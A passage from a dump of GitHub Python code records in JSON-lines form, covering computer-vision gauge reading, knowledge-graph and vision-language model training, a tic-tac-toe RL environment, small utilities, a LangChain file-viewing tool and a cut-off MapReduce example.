#image = cv2.resize(cv2.imread(\"substation_images/mitsubishi_pressure_gauge.jpg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/negative_pressure_gauge.jpg\"), (800,800), cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"substation_images/trafag_pressure_gauge.jpg\"),(800,800),cv2.INTER_CUBIC)\n\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-2.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-8.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-11.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-16.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = 
cv2.resize(cv2.imread(\"mounted pressure gauges/img-23.jpeg\"),(800,800),cv2.INTER_CUBIC)\n #image = cv2.resize(cv2.imread(\"mounted pressure gauges/img-25.jpeg\"),(800,800),cv2.INTER_CUBIC)\n\n ell = Ellipse_dlsq()\n start = time.time()\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n if gray.std() > 70 or gray.std() < 35:\n gray = cv2.equalizeHist(gray)\n\n blur = cv2.GaussianBlur(gray, (5,5), 5)\n if calculate_brightness(image) > 0.52:\n hat = cv2.morphologyEx(blur, cv2.MORPH_BLACKHAT, cv2.getStructuringElement(cv2.MORPH_RECT, (24,24)))\n else:\n hat = cv2.morphologyEx(blur, cv2.MORPH_TOPHAT, cv2.getStructuringElement(cv2.MORPH_RECT, (24,24)))\n thresh = cv2.threshold(hat, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)[1]\n\n thresh_float = np.array(thresh, dtype=\"float64\") / 255.\n edge_map = np.array(skeletonize(thresh_float)*255., dtype=\"uint8\")\n pixels = np.argwhere(edge_map != 0)\n\n ell.set_data(pixels)\n ell.fit_ellipse(points_per_sample=1500, n_iter=100)\n eigenvector = ell.cluster_eigenvecs().mean(axis=0)\n ellipse = ell.calculate_ellipse_params(eigenvector.flatten())\n print(\"Time taken = {:4.4f}s\".format(time.time() - start))\n ell.visualize_ellipse(image, ellipse)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"computervisionmerl/Analog-Gauge-Reading","sub_path":"Pressure Gauges/ellipse_detection.py","file_name":"ellipse_detection.py","file_ext":"py","file_size_in_byte":9904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29079742790","text":"from email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n\nclass Reminder:\n def __init__(self, data, mail_sender, validator, date):\n self.data = data\n self.mail_sender = mail_sender\n self.validator = validator\n self.date = date\n\n def check_date(self):\n for row in self.data:\n mail, name, title, return_at = row[1:]\n html = self.validator(mail, name, title, return_at, self.date)\n if html is not None:\n to_email = self.mail_sender.sender_mail\n from_email = self.mail_sender.sender_mail\n subject = 'Wypożyczenie książki [PRZYPOMNIENIE!]'\n message = MIMEMultipart()\n message['Subject'] = subject\n message['From'] = from_email\n message['To'] = to_email\n message.attach(MIMEText(html, \"html\"))\n msgBody = message.as_string()\n self.mail_sender.send_mail(self.mail_sender.sender_mail, msgBody)\n","repo_name":"krvcz/mail_sender","sub_path":"Reminder.py","file_name":"Reminder.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38514075883","text":"import os\nimport datetime\n\nfrom ke import fix_random, set_proc_title, parse_args, get_logger, Tester, Trainer\nfrom ke.data import KGMapping, KGDataset\nfrom ke.model import TransE\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch import optim\n\nargs = parse_args()\nNORM = args.NORM\nMARGIN = args.MARGIN\nVECTOR_LENGTH = args.VECTOR_LENGTH\nLEARNING_RATE = args.LEARNING_RATE\nEPOCHS = args.EPOCHS\nVALIDATE_FREQUENCY = args.VALIDATE_FREQUENCY\nFILTER_FLAG = args.FILTER_FLAG\nUSE_GPU = args.USE_GPU\nGPU_INDEX = args.GPU_INDEX\nDATASET_PATH = args.DATASET_PATH\nCHECKPOINT_PATH = args.CHECKPOINT_PATH\nTRAIN_BATCH_SIZE = args.TRAIN_BATCH_SIZE\nVALID_BATCH_SIZE = args.VALID_BATCH_SIZE\nTEST_BATCH_SIZE = args.TEST_BATCH_SIZE\nTARGET_METRIC = args.TARGET_METRIC\nTARGET_SCORE = args.TARGET_SCORE\nSEED = args.SEED\nPROC_TITLE = args.PROC_TITLE\nLOG = 
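The ellipse-detection record builds the Fitzgibbon-style direct least-squares fit: design matrix D, scatter matrix S = D^T D, a constant constraint matrix C, and the eigenvector of the generalized system at the single negative eigenvalue. A compact end-to-end demo mirroring that exact sign convention on synthetic points; note the eigenvalue-sign selection is numerically delicate for near-exact or degenerate data:

import numpy as np
from scipy.linalg import eig

def fit_conic(x, y):
    # Direct least-squares conic fit: minimize ||D a|| under the ellipse
    # constraint encoded in C (same C and sign convention as above).
    D = np.column_stack([x*x, x*y, y*y, x, y, np.ones_like(x)])
    S = D.T @ D
    C = np.zeros((6, 6))
    C[0, 2] = C[2, 0] = -2.0
    C[1, 1] = 1.0
    vals, vecs = eig(S, C)
    vals, vecs = np.real(vals), np.real(vecs)
    idx = np.where(vals < 0)[0][0]  # the ellipse solution
    return vecs[:, idx]

# Noisy points on the ellipse (x/3)^2 + (y/2)^2 = 1.
t = np.linspace(0, 2 * np.pi, 200)
x = 3 * np.cos(t) + 0.01 * np.random.randn(200)
y = 2 * np.sin(t) + 0.01 * np.random.randn(200)
a, b, c = fit_conic(x, y)[:3]
assert b * b - 4 * a * c < 0  # discriminant test: the fitted conic is an ellipse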
args.LOG\nNUM_WORKERS = args.NUM_WORKERS\n\nif __name__ == \"__main__\":\n now = datetime.datetime.now()\n date = f\"{now.year}-{now.month}-{now.day}\"\n logger = get_logger(date+\".txt\") if LOG else None\n message = f\"\\nMARGIN:{MARGIN}, NORM:{NORM}, VECTOR_LENGTH:{VECTOR_LENGTH}, LEARNING_RATE:{LEARNING_RATE}\\n\" \\\n f\"EPOCHS:{EPOCHS}, VALIDATE_FREQUENCY:{VALIDATE_FREQUENCY}, FILTER_FLAG:{FILTER_FLAG}\\n\" \\\n f\"USE_GPU:{USE_GPU}, GPU_INDEX:{GPU_INDEX}, SEED:{SEED}, PROC_TITLE:{PROC_TITLE}\\n\" \\\n f\"DATASET_PATH:{DATASET_PATH}, CHECKPOINT_PATH:{CHECKPOINT_PATH}\\n\" \\\n f\"TRAIN_BATCH_SIZE:{TRAIN_BATCH_SIZE}, VALID_BATCH_SIZE:{VALID_BATCH_SIZE}, \" \\\n f\"TEST_BATCH_SIZE:{TEST_BATCH_SIZE}\\n\" \\\n f\"TARGET_METRIC:{TARGET_METRIC}, TARGET_SCORE:{TARGET_SCORE}\\n\" \\\n f\"LOG:{LOG}, NUM_WORKERS:{NUM_WORKERS}\\n\"\n print(message)\n if LOG:\n logger.info(\"-\"*20+f\" {date} \"+\"-\"*20)\n logger.info(message)\n\n if not os.path.isdir(\"ckpt\"):\n os.mkdir(\"ckpt\")\n fix_random(SEED)\n set_proc_title(PROC_TITLE)\n FB15K_path = DATASET_PATH\n train_path = os.path.join(FB15K_path, \"train.txt\")\n valid_path = os.path.join(FB15K_path, \"valid.txt\")\n test_path = os.path.join(FB15K_path, \"test.txt\")\n checkpoint_path = CHECKPOINT_PATH\n\n print(\"preparing knowledge graph data...\", end='')\n if LOG:\n logger.info(\"preparing knowledge graph data...\")\n\n fb15k_mapping = KGMapping(FB15K_path)\n n_entity = fb15k_mapping.n_entity\n n_relation = fb15k_mapping.n_relation\n\n fb15k_train_dataset = KGDataset(train_path, fb15k_mapping, filter_flag=FILTER_FLAG)\n fb15k_train_dataloader = DataLoader(fb15k_train_dataset, TRAIN_BATCH_SIZE, num_workers=NUM_WORKERS)\n fb15k_valid_dataset = KGDataset(valid_path, fb15k_mapping)\n fb15k_valid_dataloader = DataLoader(fb15k_valid_dataset, VALID_BATCH_SIZE)\n fb15k_test_dataset = KGDataset(test_path, fb15k_mapping)\n fb15k_test_dataloader = DataLoader(fb15k_test_dataset, TEST_BATCH_SIZE)\n\n print(\"done\")\n if LOG:\n logger.info(\"done\")\n\n message = f\"entity_count:{n_entity}, n_relation_count:{n_relation}\\n\" \\\n f\"train_triplets_count:{fb15k_train_dataset.n_triplet}, \" \\\n f\"valid_triplets_count:{fb15k_valid_dataset.n_triplet}, \" \\\n f\"test_triplets_count:{fb15k_test_dataset.n_triplet}\\n\"\n print(message)\n if LOG:\n logger.info(message)\n\n if USE_GPU:\n assert GPU_INDEX < torch.cuda.device_count()\n device = torch.device('cuda:' + str(GPU_INDEX)) if USE_GPU else torch.device('cpu')\n\n print(\"preparing model...\", end='')\n if LOG:\n logger.info(\"preparing model...\")\n\n transe = TransE(n_entity, n_relation, VECTOR_LENGTH, p_norm=NORM, margin=MARGIN)\n transe = transe.to(device)\n optimizer = optim.SGD(transe.parameters(), lr=LEARNING_RATE)\n # optimizer = optim.Adam(transe.parameters(), lr=LEARNING_RATE)\n validator = Tester(model=transe, data_loader=fb15k_valid_dataloader, device=device,\n filter_flag=FILTER_FLAG)\n tester = Tester(model=transe, data_loader=fb15k_test_dataloader, device=device,\n filter_flag=FILTER_FLAG)\n trainer = Trainer(model=transe, train_dataloader=fb15k_train_dataloader, optimizer=optimizer,\n device=device, epochs=EPOCHS, validation_frequency=VALIDATE_FREQUENCY,\n validator=validator, checkpoint_path=checkpoint_path,\n target_metric=TARGET_METRIC, target_score=TARGET_SCORE,\n log_write_func=logger.info if LOG else None)\n\n print(\"done\")\n if LOG:\n logger.info(\"done\")\n print(transe)\n if LOG:\n logger.info(transe)\n\n print(\"-\" * 20, \"start training epochs\", \"-\" * 20)\n if LOG:\n 
logger.info(\"-\" * 20 + \" start training epochs \" + \"-\" * 20)\n\n exit_epoch, best_metric_score, loss_sum, loss_mean = trainer.run()\n message = f\"exit epoch: {exit_epoch}, loss_sum: {loss_sum}, loss_min:{loss_mean} \\n\" \\\n f\"best {TARGET_METRIC} on validation: {best_metric_score}\"\n print(message)\n if LOG:\n logger.info(message)\n\n transe.load_checkpoint(checkpoint_path)\n hits_at_1, hits_at_3, hits_at_10, mr, mrr = tester.link_prediction()\n\n message = f\"test --- \" \\\n f\"h1: {hits_at_1:<6.3f}% | \" \\\n f\"h3: {hits_at_3:<6.3f}% | \" \\\n f\"h10: {hits_at_10:<6.3f}% | \" \\\n f\"mr: {mr:<6.3f} | \" \\\n f\"mrr: {mrr:<6.3f} | \"\n print(message)\n if LOG:\n logger.info(message)\n logger.info(\"-\" * 50)\n","repo_name":"YoRHazzz/ke","sub_path":"TransE.py","file_name":"TransE.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39461649902","text":"import pytorch_lightning as pl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nfrom .model_retrieval import ALBEF\nfrom ..optim import create_optimizer\nfrom ..scheduler import WarmupCosineAnnealingLR\n\n\nclass ALBEFModule(pl.LightningModule):\n def __init__(self,\n alpha,\n warm_up,\n model_kwargs,\n optimizer_kwargs,\n lr_scheduler_kwargs,\n ):\n super().__init__()\n self.save_hyperparameters()\n self.hparams.model = type(self).__name__\n\n self.model = ALBEF.from_cktp(model_kwargs)\n\n def training_step(self, train_batch, batch_idx):\n image, text, idx = train_batch\n\n if self.current_epoch > 0 or not self.hparams.warm_up:\n alpha = self.hparams.alpha\n else:\n alpha = self.hparams.alpha * min(1, batch_idx / self.trainer.num_training_batches)\n\n loss_ita, loss_itm, matching_score = self.model(image, text, alpha=alpha, idx=idx)\n loss = loss_ita + loss_itm\n matching_acc = (matching_score >= 0.5).sum() / image.shape[0]\n\n self.log_dict(dict(loss=loss_itm+loss_ita, loss_itm=loss_itm, loss_ita=loss_ita,\n train_matching_acc=matching_acc), sync_dist=True, on_epoch=True)\n return loss\n\n # def on_train_epoch_end(self) -> None:\n # self.trainer.train_dataloader.loaders.dataset.setup()\n\n def validation_step(self, val_batch, batch_idx):\n image, text, idx = val_batch\n loss_ita, loss_itm, matching_score = self.model(image, text, alpha=self.hparams.alpha, idx=idx)\n matching_acc = (matching_score >= 0.5).sum() / image.shape[0]\n\n self.log_dict(\n {'val_loss': loss_itm + loss_ita, 'val_loss_itm': loss_itm, 'val_loss_ita': loss_ita,\n f'val_matching_acc': matching_acc},\n prog_bar=True,\n sync_dist=True)\n\n def configure_optimizers(self):\n optimizer = create_optimizer(self.hparams.optimizer_kwargs, self.model)\n\n warmup_steps = int(self.hparams.lr_scheduler_kwargs.pop('warmup_epochs') * (\n self.estimated_stepping_batches // self.trainer.max_epochs))\n scheduler = {\n \"scheduler\": WarmupCosineAnnealingLR(optimizer,\n warmup_steps=warmup_steps,\n max_steps=self.estimated_stepping_batches,\n **self.hparams.lr_scheduler_kwargs),\n \"interval\": \"step\",\n \"frequency\": 1,\n }\n return [optimizer], [scheduler]\n\n @property\n def estimated_stepping_batches(self):\n effective_accum = self.trainer.accumulate_grad_batches * self.trainer.num_devices\n batches = len(self.trainer.datamodule.train_dataloader())\n return (batches // effective_accum) * 
self.trainer.max_epochs\n","repo_name":"priyanshusankhala/VisionLanguageExplainabilit","sub_path":"vision_language_models/ALBEF/models/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5865578165","text":"from functools import lru_cache\nimport random\n# Given a set of positive numbers, determine if there exists a\n# subset whose sum is equal to a given number ‘S’.\n\ncallCount = 0\nmaxDepth = 0\n\n\ndef subsetSumBruteForce(nums, S, depth): # O (2 ^ (n + 1) - 1)\n # print(\" \" * depth, nums, S)\n # global callCount\n # callCount += 1\n # global maxDepth\n # maxDepth = max(maxDepth, depth)\n if len(nums) == 0:\n return S == 0\n choice1 = False\n if nums[0] <= S:\n choice1 = subsetSumBruteForce(nums[1:], S - nums[0], depth + 1)\n choice2 = subsetSumBruteForce(nums[1:], S, depth + 1)\n return choice1 or choice2\n\n\nnums = [random.randint(0, 10) for _ in range(10)]\nS = random.randint(0, 35)\nprint(nums, S, subsetSumBruteForce(nums, S, depth=0))\n# for i in range(1, 15):\n# callCount = 0\n# nums = [random.randint(0, 10) for _ in range(i)]\n# S = random.randint(0, 10 * i)\n# subsetSumBruteForce(nums, S, 0)\n# print(i, callCount)\n\n\n@lru_cache(1000)\ndef subsetSumTopDown(index, S):\n global callCount\n callCount += 1\n if index == len(nums):\n return S == 0\n choice1 = False\n if(nums[index] <= S):\n choice1 = subsetSumTopDown(index + 1, S - nums[index])\n if(choice1):\n return True\n choice2 = subsetSumTopDown(index + 1, S)\n return choice1 or choice2\n\n\nfor i in range(1, 15):\n callCount = 0\n nums = [random.randint(0, 10) for _ in range(i)]\n S = random.randint(0, 10 * i)\n subsetSumTopDown(0, S)\n print(i, callCount)\n","repo_name":"AnshulYADAV007/weCohort4DSA","sub_path":"Dynamic Programming/0-1 Knapsack/subset-sum.py","file_name":"subset-sum.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"5542057241","text":"import numpy as np\nfrom drl_sample_project_python.drl_lib.do_not_touch.contracts import SingleAgentEnv\n\n\nclass TicTacToe(SingleAgentEnv):\n def __init__(self, reward_win, reward_draw, reward_lose):\n self.board = np.full(9,3)\n self.cell_arr = np.arange(9)\n\n self.user_num = 0\n self.comp_num = 1\n self.nex_player = 0\n\n self.current_score = 0.0\n\n self.game_over = False\n\n self.reward_win = reward_win\n self.reward_draw = reward_draw\n self.reward_lose = reward_lose\n\n self.winner=3\n\n def is_game_over(self):\n return self.game_over\n\n def is_win(self) -> bool:\n return self.score() == 10\n\n def is_loss(self) -> bool:\n return self.score() < 0\n\n def is_draw(self) -> bool:\n return self.score() == 1\n\n def state_id(self) -> int:\n return self.board\n\n def score(self) -> float:\n return self.current_score\n\n def reset(self):\n self.board = np.full(9,3)\n self.nex_player = np.random.randint(0, 2)\n # self.nex_player = 0\n if self.nex_player == self.comp_num:\n open_slots = self.available_actions_ids()\n comp_input = np.random.choice(open_slots)\n self.place_letter(comp_input, self.comp_num)\n self.game_over = False\n self.current_score = 0.0\n self.winner = 3\n\n def available_actions_ids(self) -> np.ndarray:\n return np.where(self.board == 3)[0]\n\n def act_with_action_id(self,action_id):\n self.place_letter(action_id, self.user_num)\n if self.check_if_win(self.user_num) :\n return\n\n open_slots = 
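The subset-sum record shows the O(2^n) brute-force recursion and an `lru_cache` top-down version. The standard bottom-up DP runs in O(n·S) time and, with a one-dimensional boolean table, O(S) space; a sketch:

def subset_sum(nums, S):
    # reachable[s] is True when some subset of the numbers seen so far sums to s.
    reachable = [False] * (S + 1)
    reachable[0] = True  # the empty subset
    for num in nums:
        # Iterate downward so each number is used at most once.
        for s in range(S, num - 1, -1):
            if reachable[s - num]:
                reachable[s] = True
    return reachable[S]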
self.available_actions_ids()\n comp_input = np.random.choice(open_slots)\n self.place_letter(comp_input, self.comp_num)\n\n if self.check_if_win(self.comp_num) :\n return\n\n def check_if_win(self, last_player):\n for i in range(0, 3):\n # Checks rows and columns for match\n rows_win = (self.board.reshape(3,3)[i ,:] == last_player).all()\n cols_win = (self.board.reshape(3,3)[:, i] == last_player).all()\n if rows_win or cols_win:\n return self.finish_game(last_player)\n\n diag1_win = (np.diag(self.board.reshape(3,3)) == last_player).all()\n diag2_win = (np.diag(np.fliplr(self.board.reshape(3,3))) == last_player).all()\n\n if diag1_win or diag2_win:\n return self.finish_game(last_player)\n\n if len(self.available_actions_ids()) == 0:\n return self.finish_game(3)\n\n def finish_game(self, last_player):\n if last_player == self.user_num:\n self.current_score += self.reward_win\n self.winner=0\n # print(\"finish win\")\n elif last_player == self.comp_num:\n self.current_score += self.reward_lose\n # print(\"finish lose\")\n self.winner=1\n else :\n self.current_score += self.reward_draw\n self.winner = 2\n # print(\"finish draw\")\n # print(self.board.reshape(3,3))\n\n self.game_over = True\n return 2\n\n def place_letter(self, current_input, current_num):\n self.board[current_input] = current_num\n\n","repo_name":"agranger13/ReinforcementLearning_Cours","sub_path":"drl_sample_project_python/drl_lib/to_do/environment/TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"338107082","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Mon Jun 15 22:34:04 2020\n\n@author: Alukard\n'''\n\nimport random\nimport json\n\nusers = ['Alukard', 'JDRoldan', 'Zulu-bot']\nservices = ['Energy', 'Water', 'Gas']\n\nfor user in users:\n ''' Set median values for each service '''\n energyMedian = 10\n waterMedian = 50\n gasMedian = 30\n\n for service in services:\n ''' Open doc to write on '''\n docName = '{}-{}'.format(service, user)\n doc = open('{}.json'.format(docName), 'w')\n doc.write(\"[\\n\")\n\n ''' Determine tags for each data set '''\n # userId\n if user == users[0]:\n userTag = '5edd6f1023651b46d83a03c1'\n elif user == users[1]:\n userTag = '5edd6f6923651b46d83a03c2'\n elif user == users[2]:\n userTag = '5edd6fb123651b46d83a03c3'\n \n # Service tag\n if service == services[0]:\n serviceTag = 'E'\n elif service == services[1]:\n serviceTag = 'W'\n elif service == services[2]:\n serviceTag = 'G'\n\n # aptId / aptTag\n if user == users[0]:\n tower = 'A'\n aptTag = '101'\n elif user == users[1]:\n tower = 'B'\n aptTag = '101'\n elif user == users[2]:\n tower = 'C'\n aptTag = '101'\n\n ''' Generate random data '''\n for min in range(0,60,1):\n ''' Set values around the median for each service '''\n if service == services[0]:\n sendData = energyMedian + random.uniform(-2,2)\n while sendData < 0 or sendData > 100:\n if sendData < 0:\n sendData += random.uniform(0,1)\n if sendData > 100:\n sendData -= random.uniform(0,1)\n energyMedian = sendData\n elif service == services[1]: \n sendData = waterMedian + random.uniform(-2,2)\n while sendData < 0 or sendData > 100:\n if sendData < 0:\n sendData += random.uniform(0,1)\n if sendData > 100:\n sendData -= random.uniform(0,1)\n waterMedian = sendData\n elif service == services[2]:\n sendData = gasMedian + random.uniform(-2,2)\n while sendData < 0 or sendData > 100:\n if sendData < 0:\n sendData += random.uniform(0,1)\n if sendData > 
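`check_if_win` in the TicTacToe environment reshapes the flat board and tests rows, columns, and the two diagonals separately. The same test can be written as one pass over the eight winning lines of the flat 9-cell encoding used above (empty cells hold 3, players are 0 and 1):

import numpy as np

WIN_LINES = [(0, 1, 2), (3, 4, 5), (6, 7, 8),   # rows
             (0, 3, 6), (1, 4, 7), (2, 5, 8),   # columns
             (0, 4, 8), (2, 4, 6)]              # diagonals

def has_won(board, player):
    # board: flat length-9 array in the same encoding as the class above.
    b = np.asarray(board)
    return any((b[list(line)] == player).all() for line in WIN_LINES)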
100:\n sendData -= random.uniform(0,1)\n gasMedian = sendData\n \n \n\n data = json.dumps(\n {'userId': '{}'.format(userTag),\n 'sensorId': '{}-{}-{}'.format(serviceTag, tower, aptTag),\n 'aptId': 'T{}-{}'.format(tower, aptTag),\n 'type': '{}'.format(service),\n 'dateTime': '2020-02-02T02:{:02d}:00'.format(min),\n 'data': round(sendData, 4),\n 'status': True\n })\n if min != 59: \n doc.write(\"\\t{},\\n\".format(data))\n else:\n doc.write(\"\\t{}\\n]\".format(data))\n \n ''' Close doc '''\n doc.close()","repo_name":"AlukardSins/houtsy-app","sub_path":"Dataset Houtsy/JSON Generator.py","file_name":"JSON Generator.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26035270887","text":"import pygame\n\nimport obj\n\nclass Button:\n\tdef __init__(self, x : int, y : int, size_x : int, size_y : int, color : tuple):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.size_x = size_x\n\t\tself.size_y = size_y\n\t\tself.color = color\n\t\tself.true_color = color\n\n\t\tself.old_pressed = (0, 0, 0)\n\n\tdef render(self, win):\n\t\tpygame.draw.rect(win, self.color, (self.x, self.y, self.size_x, self.size_y))\n\n\tdef tick(self):\n\t\tx, y = self.x, self.y\n\t\tsx, sy = self.size_x, self.size_y\n\t\tmp = pygame.mouse.get_pos()\n\n\t\tif mp[0] >= x and mp[0] <= x + sx and mp[1] >= y and mp[1] <= y + sy:\n\t\t\tr, g, b = self.true_color\n\t\t\tself.color = (min(r + 50, 255), min(g + 50, 255), min(b + 50, 255))\n\n\t\t\tpressed = pygame.mouse.get_pressed()\n\t\t\tif pressed[0] and not self.old_pressed[0]:\n\t\t\t\tself.on_click(0)\n\t\t\tif pressed[1] and not self.old_pressed[1]:\n\t\t\t\tself.on_click(1)\n\t\t\tif pressed[2] and not self.old_pressed[2]:\n\t\t\t\tself.on_click(2)\n\t\t\tself.old_pressed = pressed\n\t\telse:\n\t\t\tself.color = self.true_color\n\n\tdef on_click(self, button): # 0 - left | 2 - right | 1 - middle\n\t\tpass\n\nclass CreateObjectButton(Button):\n\tdef __init__(self, x : int, y : int, size_x : int, size_y : int, color : tuple, window_size : tuple):\n\t\tsuper().__init__(x, y, size_x, size_y, color)\n\n\t\tself.window_size = window_size\n\n\tdef on_click(self, button):\n\t\tobj.add_obj(obj.Obj(self.window_size[0] // 2, self.window_size[1] // 2, \"gate\"))\n\nclass ObjectContextButton(Button):\n\tdef __init__(self, x : int, y : int, size_x : int, size_y : int, color : tuple, window_size : tuple):\n\t\tsuper().__init__(x, y, size_x, size_y, color)\n\n\t\tself.window_size = window_size\n\n\tdef on_click(self, button):\n\t\tobj.add_obj(obj.Obj(self.window_size[0] // 2, self.window_size[1] // 2, \"gate\"))\n","repo_name":"Myr-13/ScrapSchematicTool","sub_path":"ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24401948529","text":"n=0\nwhile n<5:\n try:\n s=eval(input(\"请输入你的银行卡密码:\"))\n break\n except:\n while n<4:\n n=n+1\n print(\"密码输入有误!所剩余次数还有{}次,请重新输入:\".format(5-n),end=\"\")\n try:\n s=eval(input())\n break\n except:\n continue\n break\nif n<4:\n print(\"输入密码确认无误,开始读卡!\")\nelse:\n print(\"密码输入剩余次数为0,不可再次输入\")\n","repo_name":"Yanjy2019/control-structure-and-function","sub_path":"银行卡输入密码次数限制python实现.py","file_name":"银行卡输入密码次数限制python实现.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1006284087","text":"#!/usr/bin/python\n\nimport webapp2\nimport 
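`Button.tick` in the pygame UI record does the point-in-rect test with four manual comparisons and detects clicks by diffing the current mouse state against the previous tick (edge triggering). pygame's `Rect.collidepoint` covers the first half; a sketch of both pieces factored out:

import pygame

def hovered(btn, mouse_pos):
    # Equivalent to the manual x/y range checks in Button.tick.
    return pygame.Rect(btn.x, btn.y, btn.size_x, btn.size_y).collidepoint(mouse_pos)

def rising_edges(pressed, old_pressed):
    # Mouse buttons that are down now but were up on the previous tick.
    return [i for i, (now, before) in enumerate(zip(pressed, old_pressed))
            if now and not before]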
logging\nimport person\nimport jinja2\nimport os\n\njinja_environment = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))\n\n\nclass MainPage(webapp2.RequestHandler):\n\n def get(self):\n logging.info(\"This is some log\")\n template = jinja_environment.get_template('index.html')\n self.response.out.write(template.render({}))\n\n def post(self):\n p = person.Person(key_name=self.request.get(\"cedula\"),\n cedula=self.request.get(\"cedula\"),\n first_name=self.request.get(\"first_name\"))\n p.put()\n\napp = webapp2.WSGIApplication([('/', MainPage), ('/cedula/insert', MainPage)],\n debug=True)\n\n","repo_name":"ipince/venezuelan-elections-oct-2012","sub_path":"tucedula/tucedula.py","file_name":"tucedula.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22427951139","text":"\nimport json\nfrom typing import List, Optional\n\nfrom langchain.callbacks.manager import CallbackManagerForToolRun\nfrom langchain.tools import BaseTool\n\nfrom codelearn.project.project import Project\nfrom codelearn.utils.file_util import process_file_paths\n\n\nclass FileContentViewTool(BaseTool):\n \"\"\"Tool to fetch and display detailed content of project files.\"\"\"\n\n name: str = \"get_file_content\"\n description: str = (\n \"The 'get_file_content' tool fetches and displays detailed content of specified files within the project, including both source code and documentation. It's an important tool for users who need details from the source code.\"\n \"Input a comma-separated list of full file paths to view. Incomplete paths are not accepted. For example, 'swim-main/src/example.txt' is a full file path, but 'src/example' is an incomplete directory path and is not allowed.\"\n \"Output is a dictionary with a 'files' key containing a list of dictionaries, one for each file. \"\n \"**Ensure you've requested the repository structure before asking for file contents. The requested file must exist in the project**\"\n \"Useful for users diving deep into a project's codebase or documentation to understand its intricacies.\"\n )\n project: Project\n\n def _get_file_content(self, paths: List[str]) -> dict:\n file_tree = self.project.contents\n files = []\n for path in paths:\n file_content = file_tree.get_file_content(path)\n files.append({\n \"path\": path,\n \"content\": file_content,\n \"isValid\": True if file_content else False\n })\n return json.dumps({\n \"files\": files,\n \"ToolHint\": (\n \"You now have the content of the requested files. **Then you need to answer the user's question based on the file content.**\\n\"\n \"Before answering, ensure you have enough context by considering the relevance of your response to the user's question. \"\n \"Calculate the relevance score, and if it falls below 0.7, request additional files. 
Repeat until the score is satisfactory.\n"\n \"**If you lack sufficient context to answer, continue exploring using this or other tools.**\"\n )\n })\n\n def _run(\n self,\n file_paths: str\n ) -> dict:\n \"\"\"Use the tool.\"\"\"\n paths = process_file_paths(file_paths)\n print(f\"use FileContentViewTool: {paths}\\n\")\n return self._get_file_content(paths)","repo_name":"FISHers6/CodeLearn-Agent","sub_path":"codelearn/tools/file_content_view.py","file_name":"file_content_view.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"24380409629","text":"try:\n\tfrom setuptools import setup\nexcept ImportError:\n\tfrom distutils.core import setup\n\nconfig = {\n\t'description' : 'SMS Send/Receive',\n\t'author' : 'Wendell Philip B. Saligan',\n\t'url' : 'https://github.com/wends155/modem',\n\t'download_url' : 'https://github.com/wends155/modem',\n\t'author_email' : 'saliganw@gmail.com',\n\t'version' : '0.1',\n\t'install_requires' : ['pyhumod'],\n\t'packages' : ['modem'],\n\t'scripts' : [],\n\t'name' : 'modem'\n}\n\nsetup(**config)\n","repo_name":"wends155/modem","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1581390015","text":"\"\"\"\nSample implementation of the MapReduce algorithm in Python.\nMapReduce is an algorithm (or, more correctly, a programming model)\nwhich implements both map and reduce functions to do distributed data\nprocessing.\nWe will tokenize and count words.\n\"\"\"\n\n\ntext1 = ['I love computer, but computer does not love me.']\ntext2 = ['I like margarita.', 'He does not like Gin.']\n\nprint(\" ** Method 1: Using lists to implement MapReduce.\")\n# Map\n# Map is a processing task that takes in certain input and turns it into\n# a key-value pair as an output. In this example we will take in a sentence\n# as an input and turn it into a key-value word-count pair\n\ndef mapping(text):\n # In context of text analysis, mapping is done by first tokenizing\n # words in a sentence.\n\n # Before everything else, cleaning has to be done\n # lowercasing\n text = 